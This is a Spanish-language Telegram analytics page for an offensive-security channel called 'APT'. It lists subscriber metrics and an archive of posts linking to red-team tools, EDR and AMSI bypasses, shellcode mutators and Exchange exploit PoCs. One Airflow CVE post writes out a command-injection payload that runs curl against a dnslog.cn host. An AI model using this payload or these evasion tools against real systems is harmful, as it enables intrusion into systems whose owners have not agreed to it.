APT

Ir al canal en Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Rusia45 631 Tecnologías y Aplicaciones8 841...

📈 Análisis del canal de Telegram APT

El canal APT (@apt_notes) en el segmento lingüístico de Inglés es un actor destacado. Actualmente la comunidad reúne a 14 658 suscriptores, ocupando la posición 8 841 en la categoría Tecnologías y Aplicaciones y el puesto 45 631 en la región Rusia.

📊 Métricas de audiencia y dinámica

Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 14 658 suscriptores.

Según los últimos datos del 12 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 406, y en las últimas 24 horas de 7, conservando un alto alcance.

Estado de verificación: No verificado
Tasa de interacción (ER): El promedio de interacción de la audiencia es 49.89%. Durante las primeras 24 horas tras publicar, el contenido suele obtener N/A% de reacciones respecto al total de suscriptores.
Alcance de las publicaciones: Cada publicación recibe en promedio 7 313 visualizaciones. En el primer día suele acumular 0 visualizaciones.
Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 20.

📝 Descripción y política de contenido

El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 13 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.

14 658

Suscriptores

+724 horas

+1007 días

+40630 días

7 313

Visitas de la publicación

Sin datos24 horas

Sin datos48 horas

49.89%

Tasa de compromiso

Sin datos

Mensajes por día

Ads index

beta

Archivo de publicaciones

14 658

⚙️ Meterpreter BOFLoader In this guide, you'll learn how the new BOFLoader extension allows BOFs to be used from a Meterpreter session. Discover new attacks made possible in Meterpreter and avoid common errors. https://www.trustedsec.com/blog/operators-guide-to-the-meterpreter-bofloader #msf #meterpreter #bof #loader

14 658

Repost from 1N73LL1G3NC3

Inline-Execute-PE Is a CobaltStrike toolkit enabling users to load and repeatedly run unmanaged Windows exe’s in Beacon memory without dropping to disk or creating a new process each time.

14 658

😈 Microsoft Exchange: OWASSRF + TabShell (CVE-2022-41076) The TabShell vulnerability its a form of Privilege Escalation which allows breaking out of the restricted Powershell Sandbox after you have successfully gained access through OWASSRF. For a detailed write see research: https://blog.viettelcybersecurity.com/tabshell-owassrf/ PoC: https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e #owa #ssrf #tabshell #poc

14 658

✨ Happy New Year! Happy holiday to you, dear friends and subscribers of my channel! This year has brought a lot of trouble and a lot of joyful moments. In the new year, I wish you more vulnerabilities found, interesting research and all the best. Thank you for all the support, feedback, and messages this year! Love you all ♥️

14 658

Repost from Offensive Xwitter

👹 [ snovvcrash, sn🥶vvcr💥sh ] Rewritten #DirtyVanity PoC injector to C# and #DInvoke. Great stuff @eliran_nissan! https://t.co/ifQLPMSFpb Happy upcoming New Year to everyone! 🎄 🔗 https://gist.github.com/snovvcrash/09deab831d49028e194e8ee83f2616a9 🐥 [ tweet ][ quote ]

14 658

🔑 Pass-the-Challenge This blog post introduces new techniques for recovering the NTLM hash from an encrypted credential protected by Windows Defender Credential Guard. While previous techniques for bypassing Credential Guard focus on attackers targeting new victims who log into a compromised server, these new techniques can also be applied to victims logged on before the server was compromised. Research: https://research.ifcr.dk/pass-the-challenge-defeating-windows-defender-credential-guard-31a892eee22 Source: https://github.com/ly4k/PassTheChallenge #ad #windows #ntlm #challenge

14 658

Happy Christmas to everyone!

14 658

🎲 PowerShell Obfuscation A simple and effective powershell obfuscaiton tool bypass Anti-Virus and AMSI-bypass + ETW-block. https://github.com/H4de5-7/powershell-obfuscation #powershell #obfuscation #amsi #etw #bypass

14 658

👾 Windows Drivers Reverse Engineering Methodology This blog post details a methodology for reverse engineering and finding vulnerable code paths in Windows drivers. Including a guide for setting up a lab for (the pesky) kernel debugging. https://voidsec.com/windows-drivers-reverse-engineering-methodology/ #reverse #driver #analysis

14 658

💥 Shellcode Mutator New tool to help red teamers avoid detection. Shellcode is a small piece of code that is typically used as the payload in an exploit, and can often be detected by its “signature”, or unique pattern. Shellcode Mutator mutates exploit source code without affecting its functionality, changing its signature and making it harder to reliably detect as malicious. Research: https://labs.nettitude.com/blog/shellcode-source-mutations/ Source: https://github.com/nettitude/ShellcodeMutator #shellcode #mutator #nasm #redteam

14 658

😈 OWASSRF — New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations CrowdStrike recently discovered a new exploit method using CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access. https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/ #owa #exchange #ssrf #proxynotshell

14 658

Repost from internet-lab.ru

🔐 MULTIFACTOR — особенности 2FA Существует неплохое решение для организации двухфакторной аутентификации в корпоративной среде под названием MULTIFACTOR. Входит в реестр российского ПО за номером 7046. Это не реклама, поскольку сегодня буквально в двух словах мы расскажем про то как этот второй фактор можно обойти в некоторых очень частных случаях. Бу-га-га. #security #special https://internet-lab.ru/multifactor_2fa_bug

14 658

💉 Dirty Vanity — A New Approach to Code injection & EDR bypass A POC for the new injection technique, abusing windows fork API to evade EDRs. Source: https://github.com/deepinstinct/Dirty-Vanity Research: https://i.blackhat.com/EU-22/Thursday-Briefings/EU-22-Nissan-DirtyVanity.pdf #av #edr #bypass #injection #fork #api

14 658

$⚔️ DirCreate2System Weaponizing to get NT AUTHORITY\SYSTEM for Privileged Directory Creation Bugs with Windows Error Reportin$

⚔️ DirCreate2System Weaponizing to get NT AUTHORITY\SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting https://github.com/binderlabs/DirCreate2System #windows #privesc #directory #error #report

14 658

⚔️ Mangle — EDR Bypass This is a tool that manipulates aspects of compiled executables (.exe or DLL). Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files. In doing so, Mangle helps loaders evade on-disk and in-memory scanners. https://github.com/optiv/Mangle #edr #bypass #inflate #certificate

14 658

🎁 HackTheBox — ProLab Discount HackTheBox is running a huge pro-lab discount this month. Use coupon code: "weloveprolabs22" and waive the setup fee ($95) of any pro lab. Each pro lab is $27/m, which makes this over 75% off. The coupon expires at the end of the year. #hackthebox #prolab #discount

14 658

Repost from Ralf Hacker Channel

Довольно интересный анализ на примере Аваста Hooking System Calls in Windows 11 22H2 like Avast Antivirus. Research, analysis and bypass https://the-deniss.github.io/posts/2022/12/08/hooking-system-calls-in-windows-11-22h2-like-avast-antivirus.html #research #redteam

14 658

Repost from In4sek stories

https://telegra.ph/StandoFF-prelude-11-20

14 658

💨 Apache Airflow RCE Tracked as CVE-2022-40127, the flaw affects Apache Airflow versions prior to 2.4.0. Apache Airflow could allow a remote attacker to execute arbitrary commands via the manually provided run_id parameter, which exists in Example Dags of Apache Airflow. By sending a specially crafted request, an attacker could exploit the CVE-2022-40127 flaw to execute arbitrary commands. PoC: 1. Active example_bash_operator at DAGs 2. Run ID parameter

{"test":"\";curl `id -u`.xxx.dnslog.cn;\""}

#apache #airflow #dags #rce

14 658

💣 ProxyNotShell PoC ProxyNotShell this is a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery vulnerability (CVE-2022-41040) and a second vulnerability that allows Remote Code Execution (CVE-2022-41082) when PowerShell is available on the Exchange Server. Research: https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend Nmap Checker: https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse PoC: https://github.com/testanull/ProxyNotShell-PoC #exchange #proxynotshell #ssrf #rce